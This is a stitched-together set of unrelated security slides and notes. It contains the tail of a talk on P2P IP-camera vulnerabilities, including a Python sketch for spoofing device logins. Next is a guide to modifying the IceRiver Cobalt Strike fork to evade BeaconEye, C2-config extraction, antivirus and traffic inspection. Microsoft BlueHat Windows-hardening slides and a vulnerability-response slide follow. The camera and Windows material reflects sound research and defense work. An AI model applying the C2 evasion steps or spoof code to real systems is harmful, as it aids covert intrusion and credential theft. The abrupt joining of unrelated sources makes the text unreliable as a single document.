BOAVISION
Escam
LEFTEK
Royallite
Wanscam
COOAU
FLOUREON
Loosafe
SDETER
WGCC
CPVAN
GatoCam
Luowice
SV3C
WYJW
Ctronics
GENBOLT
MEOBHI
SY2L
ZILINK
D3D Security
Hongjingtian (HJT)
Nesuniq
Tenvis
Zysecurity
Hunting for vulnerabilities
• Obtained firmware samples from reseller sites (often just a ZIP file, easy to analyze)
• HI_P2P_Cmd_ReadRequest handles commands received over P2P
• Used for everything including login; you don't need auth to hit this function
Pre-auth remote code execution (CVE-2020-9527)
• Buffer overflow in login routine allows remote execution of arbitrary code
• If you have a vulnerable device’s UID, you can get a shell!
• Binaries compiled without ASLR/PIE/stack canaries
• Offsets vary between versions, but very reliable code execution
• Affects firmware from August 2018 through June 2020
Password reset via LAN (CVE-2020-9529)
• Affects all firmware prior to June 2020
Abusing P2P to Conduct
Man-in-the-Middle Attacks
Over-the-Internet MITM
• P2P servers coordinate all connections
• If we can influence that, man-in-the-middle may be possible
• Can be done over-the-Internet, not restricted to local network
• The P2P layer offers no effective protection of session data
• Application is entirely responsible for security
• Most do not employ encryption at all, or do so in an insecure fashion
Over-the-Internet MITM
• Devices regularly log in to P2P servers
• Server takes note of message origin (IP and UDP port)
• When a client requests a connection, servers tell client to punch to that address
• This login message contains just the UID -- no device-specific secret
• If we possess a UID, we can forge this message to confuse the server
• The user will connect to us and authenticate without hesitation…
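The spoof itself is then almost embarrassingly small. A Python sketch, with the framing entirely hypothetical (the real MSG_DEV_LGN field layout is not reproduced here, so the type byte and body below are made up):

import socket, struct, time

def out_login_device(server, uid: bytes):
    body = uid.ljust(24, b"\x00")                 # hypothetical body: just the UID
    pkt = struct.pack(">BBH", 0xF1, 0x10, len(body)) + body   # 0x10: made-up type
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:                                   # keep "logging in" so the
        s.sendto(pkt, (server, 32100))            # server's device record points at us
        time.sleep(5)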
Over-the-Internet MITM
• CS2 sometimes "encrypts" the login message…
• MSG_DEV_LGN_CRC instead of MSG_DEV_LGN
• Proprietary symmetric cipher; vendor sets a "CRC key" for their P2P server
• All their devices need to ship with that key (i.e. accessible in firmware)
• Some servers allow logging in without the key anyway 🤪
• Affects iLnkP2P (CVE-2019-11220) and CS2 (CVE-2020-9525)
• No response from Shenzhen Yunni
• CS2 states new version 4.0 will fix this
Passive over-the-Internet MITM
• Active attack requires a UID, knowledge of protocol, timing, etc...
• Instead of targeting devices, let the devices come to us.
• Remember superdevices?
• Devices that relay sessions for other users
• Most vendors use these to support their network
• The P2P layer does not securely encrypt relayed traffic
• The application traffic is typically not encrypted either…
Passive over-the-Internet MITM
This means anyone can buy a device
and access other people’s traffic.
Passive over-the-Internet MITM
• With gentle PCAP parsing, can actually stream packets straight into ffplay
• Users have no way of knowing whether their connection is being intercepted
• Bonus! UIDs are leaked during the P2P handshake
• Exploited this to collect over 236,000 unique CS2 UIDs in 10 months
• Affects iLnkP2P and CS2 (CVE-2020-9526)
• CS2 states new version 4.0 will fix this
Passive over-the-Internet MITM
Demo time!
Final Thoughts
Patching
CVE            | Vendor / Product | Vulnerability                | Status
CVE-2019-11219 | Yunni iLnkP2P    | UID enumeration              | Unpatched
CVE-2019-11220 | Yunni iLnkP2P    | Device spoofing (MITM)       | Unpatched
CVE-2020-9525  | CS2 Network P2P  | Device spoofing (MITM)       | Patch pending (v4.0)
CVE-2020-9526  | CS2 Network P2P  | Data leakage in superdevice  | Patch pending (v4.0)
CVE-2020-9527  | Hichip           | Buffer overflow              | Patched (June 2020)
CVE-2020-9528  | Hichip           | Cryptographic weaknesses     | Patched (June 2020)
CVE-2020-9529  | Hichip           | Password reset via LAN       | Patched (June 2020)
A bleak outlook
• No hope for some of these issues being fixed retroactively
• Fundamental flaws with no chance of backwards compatibility
• Doesn't really matter. Users don't update -- some firmware versions go back to 2015!!
• Sellers won't pull defective products1
• Amazon: No comment received
• eBay: "These devices can be used safely if used in a network without an internet
connection" 🙄 🙄 🙄
1: https://www.which.co.uk/news/2020/06/more-than-100000-wireless-security-cameras-in-the-uk-at-risk-of-being-hacked/
Further research
• More device-specific vulnerabilities exploitable through P2P
• Other P2P platforms (e.g. Wyze uses ThroughTek Kalay)
• Other large device manufacturers
• Higher up the supply chain in general!
Reversing tips
• Samples, samples, samples!! Never too many.
• APKs: Java decompiles into beautiful, readable code (check out JADX!)
• Throw every single interesting filename or magic string you find into GitHub
• May reveal SDKs, docs, client source, even firmware source
References
• Balazs, Zoltan. “IoT Security Is a Nightmare. But What Is the Real Risk?,” August 21, 2016.
https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
• Serper, Amit. “Zero-Day Exploits Could Turn Hundreds of Thousands of IP Cameras into IoT
Botnet Slaves,” December 6, 2016.
https://www.cybereason.com/blog/zero-day-exploits-turn-hundreds-of-thousands-of-ip-cameras-into-iot-botnet-slaves
• Kim, Pierre. “Multiple Vulnerabilities Found in Wireless IP Camera (P2P) WIFICAM Cameras
and Vulnerabilities in Custom HTTP Server,” March 8, 2017.
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
• Martin, Balthasar, and Bräunlein, Fabian. "Next-Gen Mirai," November 16, 2017.
https://srlabs.de/wp-content/uploads/2017/11/Next-Gen_Mirai.pdf
• Viehböck, Stefan. "Millions of Xiongmai Video Surveillance Devices Can be Hacked via Cloud
Feature (XMEye P2P Cloud)," October 9, 2018.
https://sec-consult.com/en/blog/2018/10/millions-of-xiongmai-video-surveillance-devices-can-be-hacked-via-cloud-feature-xmeye-p2p-cloud
Thank you!
@PaulMarrapese
[email protected]
https://hacked.camera
1
IceRiver: Notes on Customizing a Recent Q.V Release

Feature List
● Changed the default login-authentication header magic and the magic at the head of the authentication-success response, to evade brute-force scanner scripts
● Changed the default XOR key of the beacon configuration, to partially defeat automated extraction of C2 configuration
● Changed the default fill value of the heap block holding the configuration data, to evade BeaconEye scans
● Changed the HTTP User-Agent header, to partially evade full-traffic inspection
● Added a beacon counter for easier tallying of results
● Self-inject mode
● Bundled winvnc into the client, so the winvnc DLL no longer needs to be uploaded on the TeamServer side
● Renamed the default client configuration file and encrypted the stored login password so it cannot be read in plaintext

Change Log
● Changed the default login-authentication header magic and the authentication-success response magic, to evade brute-force scanner scripts
● Changed the default XOR key of the beacon configuration, to partially defeat automated C2 config extraction
● Changed the default fill value of the heap block holding the configuration data, to evade BeaconEye scans
● Changed the HTTP User-Agent header, to partially evade full-traffic inspection
● Added a beacon counter for easier tallying of results
● Self-inject mode: injecting into the beacon itself sidesteps AV interception of injection into sacrificial processes and bypasses detection by some AV products. Supported modules: Screenshot, Screenwatch, Hashdump, Desktop, Printscreen, ChromeDump, PassTheHash (pth), DcSync, LogonPasswords, NetView (net), KeyLogger, PortScan, PowerShell (powerpick), SSHAgent (ssh, ssh-key). Self-injection support for third-party plugins was also added.
● Bundled winvnc into the client, avoiding the winvnc DLL upload on the TeamServer side
● Renamed the default client configuration file and encrypted the stored login password to prevent plaintext reads

Details
Changing the default login-authentication header magic and the success-response magic, to evade brute-force scanner scripts

From the version 4.4 TeamServer Java code you can recover the header value and the data returned on successful authentication.
Searching for 48879 in IDA locates the first value at 1D5D7B2; the second is at 1D5DF0E.
Patch each to the desired header value; note that no nop instructions may be introduced.

Changing the default XOR key of the beacon configuration, to partially defeat automated C2 config extraction
Files to modify:
● beacon.dll / beacon.rl100k.dll
● beacon.x64.dll / beacon.x64.rl100k.dll
● dnsb.dll / dnsb.rl100k.dll
● dnsb.x64.dll / dnsb.x64.rl100k.dll
● extc2.dll / extc2.rl100k.dll
● extc2.x64.dll / extc2.x64.rl100k.dll
● pivot.dll / pivot.rl100k.dll
● pivot.x64.dll / pivot.x64.rl100k.dll
● sshagent.dll / sshagent.x64.dll

In the config-decryption routine (the fdwReason == 1 path) you can see the XOR with 0x2E. Just replace that default key, and change the XOR key inside the beacon_obfuscate function of the client's beacon/BeaconPayload.java to match, so the client stays consistent with the beacon side.
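For illustration only, a minimal Python model of the single-byte XOR masking described above (0x2E is the stock key; the function name mirrors the client-side beacon_obfuscate, but this is not the shipped code):

def beacon_obfuscate(data: bytes, key: int = 0x2E) -> bytes:
    # XOR is symmetric, so the same routine masks and unmasks
    return bytes(b ^ key for b in data)

masked = beacon_obfuscate(b"example-config")
assert beacon_obfuscate(masked) == b"example-config"

Whatever replacement key is chosen has to be patched identically into the DLLs and the Java client, or the teamserver and beacon will no longer understand each other.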
Changing the default fill value of the configuration heap block, to evade BeaconEye scans

Files to modify:
● beacon.dll / beacon.rl100k.dll
● beacon.x64.dll / beacon.x64.rl100k.dll
● dnsb.dll / dnsb.rl100k.dll
● dnsb.x64.dll / dnsb.x64.rl100k.dll
● extc2.dll / extc2.rl100k.dll
● extc2.x64.dll / extc2.x64.rl100k.dll
● pivot.dll / pivot.rl100k.dll
● pivot.x64.dll / pivot.x64.rl100k.dll
● sshagent.dll / sshagent.x64.dll

When the heap memory holding the configuration is allocated (again on the fdwReason == 1 path), it is initialized with the default value 0; changing the fill to any non-zero value is enough to get past a BeaconEye scan.
Changing the HTTP User-Agent header, to partially evade full-traffic inspection

The built-in pool covers python / java / php / go / curl / wget / Windows / Linux / macOS:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:77.0) Gecko/20100101 Firefox/77.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/75.0
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20191022 Firefox/70.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20190101 Firefox/70.0
Mozilla/5.0 (Windows; U; Windows NT 9.1; en-US; rv:12.9.1.11) Gecko/20100821 Firefox/70
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:69.2.1) Gecko/20100101 Firefox/69.2
Mozilla/5.0 (Windows NT 6.1; rv:68.7) Gecko/20100101 Firefox/68.7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Mozilla/5.0 (Windows NT 6.2; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/58.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/58.0
Mozilla/5.0 (Windows NT 5.0; Windows NT 5.1; Windows NT 6.0; Windows NT 6.1; Linux; es-VE; rv:52.9.0) Gecko/20100101 Firefox/52.9.0
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20120121 Firefox/46.0
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.66.18) Gecko/20177177 Firefox/45.66.18
Mozilla/5.0 (Windows NT 9.2; Win64; x64; rv:43.43.2) Gecko/20100101 Firefox/43.43.2
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0
Mozilla/5.0 (Windows ME 4.9; rv:31.0) Gecko/20100101 Firefox/31.7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0
Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0
Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0
Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/23.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:23.0) Gecko/20131011 Firefox/23.0
Mozilla/5.0 (Windows NT 6.2; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:16.0.1) Gecko/20121011 Firefox/21.0.1
Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0
Mozilla/5.0 (Windows NT 6.2; WOW64; rv:21.0) Gecko/20130514 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0
Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0
Mozilla/5.0 (Windows x86; rv:19.0) Gecko/20100101 Firefox/19.0
Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0
Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/18.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
python-requests/2.25
Java/1.8.0_232
curl/7.54
Go-http-client/1.1
Wget/3.4.1
Adding a beacon counter for easier tallying of results

At the end of the getContent function in aggressor/browsers/Sessions.java, add the following code:
JPanel mainPanel = new JPanel();
mainPanel.setLayout(new BorderLayout());
Box verticalBox = Box.createVerticalBox();
Box horizontalBox = Box.createHorizontalBox();
JPanel totalBeacon = new JPanel();
totalBeacon.setLayout(new BorderLayout());
horizontalBox.add(new JLabel("Total Beacons: "));
JLabel totalBeaconView = new JLabel(String.valueOf(this.model.getRowCount()));
this.table.getModel().addTableModelListener((tableModelEvent) -> {
    totalBeaconView.setText(String.valueOf(this.model.getRowCount()));
});
horizontalBox.add(totalBeaconView);
totalBeacon.setMaximumSize(new Dimension(220, 100));
totalBeacon.add(horizontalBox, "North");
verticalBox.add(totalBeacon);
verticalBox.add(DialogUtils.FilterAndScroll(this.table));
mainPanel.add(verticalBox);
return mainPanel;
Self-inject mode

Because the Java class hash-id computation must stay consistent, new fields cannot be added to the BeaconEntry class the way the 4.4 patch did it. Instead a class variable is added and each BeaconEntry's configuration is stored in a HashMap; the benefit is that this does not affect other operators on the team. Concretely:
Add inject to cols in aggressor/browsers/Sessions.java; this displays the inject field in the UI.
In common/BeaconEntry.java, add the class variable injectMode plus the functions getInject, setLessInject, setFullInject and setDefaultInject, used to store the current beacon's configuration and to switch between configurations.
The remaining changes follow the same approach as in 4.4 and are not detailed again. With SelfInject mode enabled, status messages begin with "IceRiver By Attack2Defense <CobaltStrike 4.7> Self Inject".
SelfInject support for third-party custom plugins is still being implemented.

Bundling winvnc into the client, so the winvnc DLL need not be uploaded on the TeamServer side

CS 4.7's design is awkward here: when a Desktop task runs, the client first sends an aggressor.resource command to the teamserver; the teamserver reads the winvnc.arch.dll from its third-party directory and returns the contents to the client for RDI processing; the client then builds an inject or spawn command and sends it back to the teamserver.
After the modification the flow is direct: the DLL is read from the client's resources directory, the command is built, and it is sent straight to the teamserver.
Renaming the default client config file and encrypting the stored login password, to prevent plaintext reads

Change the original .aggressor.prop filename in aggressor/Prefs.java, along with the resources/aggressor.prop name.
When the password is saved and read back, it is encrypted and decrypted with a randomly generated AES key. A filter is added to the getString and set methods of aggressor/Prefs.java: when a password is being saved or modified, encryption runs before the save and decryption after the read.
The cipher is symmetric AES-CTR, so anyone who extracts the key and IV shipped with the client can decrypt the stored ciphertext.
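A sketch of why that matters, assuming pycryptodome and placeholder names (the real IceRiver identifiers are not shown here): with AES-CTR, anyone holding the client's bundled key and IV decrypts the stored password directly.

from Crypto.Cipher import AES  # pycryptodome

def decrypt_saved_password(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    # CTR mode, using the bundled IV as the initial counter block
    cipher = AES.new(key, AES.MODE_CTR, nonce=b"", initial_value=iv)
    return cipher.decrypt(ciphertext)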
Bluehat Shanghai 2019
David "dwizzzle" Weston
Microsoft OS Security Group Manager
Advancing Windows Security
Good morning, Shanghai!
Windows for PCs
Familiar desktop experience
Broad hardware ecosystem
Desktop app compat
One Core OS
Base OS
App and Device Platform
Runtimes and Frameworks
Windows on XBOX
10 Shell experience
Unique security model
Shared gaming experience
Windows on IOT
Base OS
App and Device Platform
Runtimes and Frameworks
Windows for …
Form factor appropriate
shell experience
Device specific scenario
support
Windows is evolving….
Malicious code cannot persist on a device.
Violations of promises are observable.
All apps and system components have only the privilege they need.
All code executes with integrity.
User identities cannot be compromised, spoofed, or stolen.
Attacker with casual physical access cannot modify data or code on the device.
Increasing Security
Windows 10 S vs. Classic
10 S:
1 Mandatory Code Signing
2 Complete Password-less
3 "Admin-less" user account
4 Internet scripts and macros blocked
Classic:
1 Run as admin
2 Execute Unsigned Code
3 Use passwords
4 Mitigations not always on
10 S: Millions of installs, no widespread detections of malware
All code executes with integrity.
Code Integrity Improvements
CI policy removes many “proxy” binaries
Store signed only apps (UWP or Centennial)
“Remote” file extensions that support dangerous actions are blocked
Remote Office Macros are blocked by default
Windows 10 S
[Diagram: 10 S lockdown layers: all binaries Microsoft-signed; proxy binaries removed; dangerous handlers blocked; remote dangerous files blocked]
1st Order Code Integrity protection
A “1st order” CI bypass enables a remote attack to
trigger initial unsigned code execution
10 S focuses on preventing “1st” order bypasses
A “2nd order” bypass enabled additional unsigned code
execution after reaching initial code execution
10 S offers less durable guarantees for “2nd” order
bypasses
Windows 10 S
[Diagram: a trigger arrives over the network and reaches a handler on the physical machine; the yes/no decision at that boundary is where 1st-order bypasses happen]
Exploit Mitigation Strategy
Increase cost of exploitation: control flow integrity, signed code only, read-only data
Eliminate bug classes
Control Flow Challenges
1 Dangerous call targets
2 Unprotected stack
3 Data corruption
Call sites:
((void(*)(int, int)) funcptr)(0, 1);
obj->method1();

Call targets:
void function_A(int, int) { ... }
int function_B(int, int) { ... }
void function_C(Object*) { ... }
void Object::method1() { ... }
void Object::method1(int, int) { ... }
void Object::method2() { ... }
void Object2::method1() { ... }

CFG
First generation CFI in Windows, coarse grained for compatibility and performance
“Export suppression” used to reduce number of call sites in specific processes (example: Microsoft Edge)
Improving Control Flow Integrity
Introducing: XFG
Goal: Provide finer-grained CFI in a way that is efficient and compatible
Concept: restrict indirect transfers through type signature checks
Call sites:
((void(*)(int, int)) funcptr)(0, 1);
obj->method1();

Call targets:
void function_A(int, int) { ... }
int function_B(int, int) { ... }
void function_C(Object*) { ... }
void Object::method1() { ... }
void Object::method1(int, int) { ... }
void Object::method2() { ... }
void Object2::method1() { ... }
Improving Control Flow Integrity
XFG design: basics
Assign a type signature based tag to each address-taken function
For C-style functions, could be:
hash(type(return_value), type(arg1), type(arg2), ...)
For C++ virtual methods, could be:
hash(method_name, type(retval), highest_parent_with_method(type(this), method_name), type(arg1), type(arg2), ...)
Embed that tag immediately before each function so it can be accessed through function pointer
Add tag check to call-sites: fast fail if we run into a tag mismatch
Improving Control Flow Integrity
CFG instrumentation (call site and target):
mov  rax, [rsi+0x98]               ; load target address
call [__guard_dispatch_icall_fptr]

.align 0x10
function:
push rbp
push rbx
push rsi
...

XFG instrumentation (call site and target):
mov  rax, [rsi+0x98]                    ; load target address
mov  r10, 0xdeadbeefdeadbeef            ; load function tag
call [__guard_dispatch_icall_fptr_xfg]  ; will check tag

.align 0x10
dq 0xcccccccccccccccc ; just alignment
dq 0xdeadbeefdeadbeef ; function tag
function:
push rbp
push rbx
push rsi
...
XFG Security
C-style function pointers can only call address-taken functions with same type signature
Call-site and targets have same number of arguments, arguments and return value have same types
C++ virtual methods can only call methods with same name and type in their class hierarchy
Can’t call wrong-type overload methods
Can’t call methods from other class hierarchies
Can’t call differently-named methods with same type in same hierarchy
This is much stronger than CFG, although it is an over-approximation
It should be noted that the use of a hash function means there could technically be collisions, but that is very unlikely (especially in a useful way) on a ~55 bit hash
Improving Control Flow Integrity
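A back-of-the-envelope model of the tag computation, in Python. The slides only say the hash is roughly 55 bits; the compiler's actual hash construction is not spelled out here, so treat this as a concept sketch, not the shipped algorithm:

import hashlib

def xfg_tag(return_type, arg_types):
    # hash the flattened type signature and truncate to ~55 bits
    sig = "%s(%s)" % (return_type, ",".join(arg_types))
    digest = hashlib.sha256(sig.encode()).digest()
    return int.from_bytes(digest[:7], "little") & ((1 << 55) - 1)

# a call through void(*)(int,int) only matches targets carrying this tag:
print(hex(xfg_tag("void", ["int", "int"])))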
Control Flow Challenges
1 Dangerous call targets
2 Unprotected stack
3 Data corruption
Shadow Stack Protection
Initial attempt to implement stack protection in software failed
OSR designed software shadow stack (RFG) did not survive internal offensive
research
Control-flow Enforcement Technology (CET)
Return address protection via a shadow stack
Hardware-assists for helping to mitigate control-flow hijacking & ROP
Robust against our threat model (assume arbitrary RW)
Rearward Control Flow
CET Shadow Stack Flow:
Call pushes the return address on both stacks
Ret/ret_imm pops the return address from both stacks
Exception if the return addresses don't match
No parameter passing on the shadow stack
[Diagram: stack usage on near CALL; the return EIP sits above the parameters on the data stack (ESP), while the shadow stack (SSP) holds only return EIPs]
Control Flow Integrity Challenges
1 Dangerous call targets
2 Unprotected stack
3 Data corruption
Introducing: Kernel Data Protection
Problem: Kernel exploits in Windows leverage
data corruption to obtain privilege escalation
Current State: Hypervisor-based code integrity
prevents dynamic code injection and enforces
signing policy
Preventing code injection alone is not enough; the kernel has many sensitive data structures
Kernel Data Protection (KDP) uses Secure Kernel
to enforce immutability
Data Corruption Protection
CVE-2016-7256 exploit: Open type font elevation of privilege
Corrupting Code Integrity Globals (credit: FuzzySec)
Data Corruption Protection
[Diagram: an admin-level attacker process loads vulnerable signed drivers (VBOX, Capcom, CPU-Z) to corrupt static and dynamic kernel data]

NTSTATUS MmProtectDriver (
    _In_ PVOID AddressWithinSection,
    _In_ ULONG Size,
    _In_opt_ ULONG Flags);
Kernel Data Protection:
Mechanism to perform read-only pool allocations
RO PTE Hypervisor Protected when VBS is enabled
Validation mechanism to allow callers to detect whether
the memory they’re referencing is protected pool allocation
All apps and system components have only
the privilege they need
Introducing: Admin-less
Elevation is blocked in Admin-less S mode
New standard user type can make some device-wide changes
"Admin-less" Mode
Malicious code cannot persist on a device.
Firmware Security Issues
ESET discovers SEDNIT/APT28 UEFI malware
SMM attacks to bypass VBS
“ThinkPWN” exploit of Lenovo firmware
System Guard with DRTM
Utilize DRTM (Intel, AMD, QC) to perform TCB measurements from a Microsoft
MLE
“Assume Breach” of UEFI and measure/seal critical code and data from hardware
rooted MLE
Measured values:
Code integrity Policy
Hypervisor, kernel hashes
UEFI Vars
Etc…
Zero Trust
Measurements of key properties available in PCRs and TCG logs
Attest TCB components through System Guard runtime attestation + Microsoft
Conditional Access + WDATP
SMM Attacks
Can be used to tamper HV and SK post-MLE
SMM paging protections + attestation on roadmap
Improving Boot Security
Improving Boot Security
System Guard with DRTM
External researchers and OSR REDTEAM highlighted SMM risks for DRTM
and VBS
Arbitrary code execution in SMRAM can be used to defeat Hypervisor
Malicious code running in SMM is difficult to detect
Improving Boot Security
SMM vulnerabilities used by the OSR REDTEAM were reported to Lenovo
Mitigating SMM exploitation
Intel Runtime BIOS resilience provides the following security
properties for SMM:
SMM entry point locked down
All code within SMM locked down
Memory map and page properties locked down
OS and HV memory not directly accessible from SMM
Protecting SMM
[Diagram: the SMM page table and SMI handler confine SMM execution to SMRAM, isolated from the other memory regions: BootCode/BootData, MMIO, Reserved, ACPINvs, RuntimeCode/RuntimeData, ACPI Reclaim, LoaderCode/LoaderData]
SMM Paging Audit
SMM Protection
Attackers with casual physical access
cannot modify data or code on the device.
Increasing Physical Attacks
LPC/SPI TPM VMK Key Extraction with Logic Analyzer
Sources: 1, 2, 3
Bitlocker Cold Boot Attacks
Sources: 1
DMA Attacks with PCILeech
Sources: 1, 2
Security Goals
Prevent ‘’evil cleaner’’ drive by physical attacks from
malicious DMA attacks
Design Details
Use IOMMU to block newly attached Thunderbolt™ 3
devices from using DMA until an user is logged in
UEFI can enable IOMMU an BME in early boot until Windows
boots (See Project Mu)
Automatically enable DMA remapping with compatible
device drivers
In future releases, we are looking to harden protection on all
external PCI ports and cross-silicon platforms
Windows DMA protection
[Flowchart: a peripheral is connected; if its drivers opted into DMA remapping (DMAr), DMAr is enabled for the peripheral right away; otherwise the OS waits until a user is logged in and the screen is unlocked before new devices are enumerated and functioning]
Security Goals
Prevent ‘’evil cleaner’’ drive by physical attacks from
malicious DMA attacks
Design Details
Use IOMMU to block newly attached Thunderbolt™ 3
devices from using DMA until an user is logged in
Automatically enable DMA remapping with compatible
device drivers
In future releases, we are looking to harden protection on all
external PCI ports and cross-silicon platforms
Thunderclap Attack
Windows Data Protection Under Lock
Per-file encryption provides a second layer of protection at rest
Key is derived from user secret (Hello, Biometric)
Locked device: encryption key is removed from memory
Unlocked device: encryption key is recomputed using user entropy
[Diagram: enlightened apps (messaging apps, Edge, Health, Mail/Photos/Documents) keep messages, passwords and credit-card info, health data, and documents encrypted with keys discarded upon lock; unenlightened app data (App1-App3) is encrypted with keys discarded upon shutdown; everything sits on top of the BitLocker protection promise]
User identities cannot be compromised,
spoofed, or stolen.
Windows Hello and NGC
Offers biometric authentication and hardware backed
key storage
PIN vulnerable to input attacks from malicious admin
Improving Identity Security
Future version of Windows include biometric hardening
enabled through virtualization
Biometric hardening of the data path using
virtualization
Hardening of credential release
Improving Identity Security
Windows Hello Attack Surface
[Diagram: in the Windows Biometric Framework, a sensor driver feeds the Biometric Unit (sensor adapter; engine adapter performing feature extraction and template construction; storage adapter with the template DB). Labeled attack points: spoofs at the sensor; replay and leak/inject on the data paths; template modification and injection in the DB; adding unauthorized templates; modifying the match result; injecting match events; stealing the TPM authblob.]
[Diagram: the hardened design moves the engine and storage adapters into bioIso.exe behind a secure driver, removing the data-path, template, and match-result attack points from the normal OS.]
Beyond Passwords
Violations of promises are observable.
Platform Tamper Detection for Windows
Spanning device boot to ongoing runtime process tampering
Designed for remote assessment of device health
Platform approach to benefit a variety of 3rd parties and scenarios
Hardware rooted device trust
Leverage the VBS security boundary to raise the bar on anti-tampering
Challenging to build tamper detection schemes on top of Windows
Extensible platform component that can be used via forthcoming public API
Tamper Evident Windows
[Diagram: an admin attacker process loads vulnerable drivers (VBOX, Capcom, CPU-Z) to tamper with EPROCESS, driver dispatch, and process mitigations]
Closing
Platform features rapidly changing
Windows is evolving quickly to increase protections against new
attacks
Aspirational goals to provide strong guarantees across a growing
threat model
Researchers and Community help us improve
Programs such as bug and mitigation bounty are critical
We want to work together with research communities in China
and beyond to learn more about current and future attacks
Windows needs the community
Six Questions of Vulnerability Response
How to archive vulnerabilities
How to run vulnerability operations
How to track vulnerabilities
How to collect vulnerabilities from the vast sea of bugs
How to tell low-value vulnerabilities from real ones
How to handle vulnerabilities during the response phase
A total of 1,209 vulnerabilities were catalogued, of which:
Highly exploitable vulnerabilities: 238
High-severity but not highly exploitable: 267
Medium-severity, moderate impact: 742
Low-severity, minimal impact: 66
[Pie chart labels: medium-severity 61.42%; highly exploitable 10.97%; high-severity (not highly exploitable) 22.12%; low-severity 5.49%]
The Importance of Standardization
Vulnerability collection: automated collection + manual screening = entry into the platform
Severity rating and distribution: rating pyramid model + vulnerability-expert training program
Vulnerability response: standardized response process (advisory + reproduction + detection + defense)
Vulnerability tracking: standardized tracking process (patch + affected users + variants + root cause + impact)
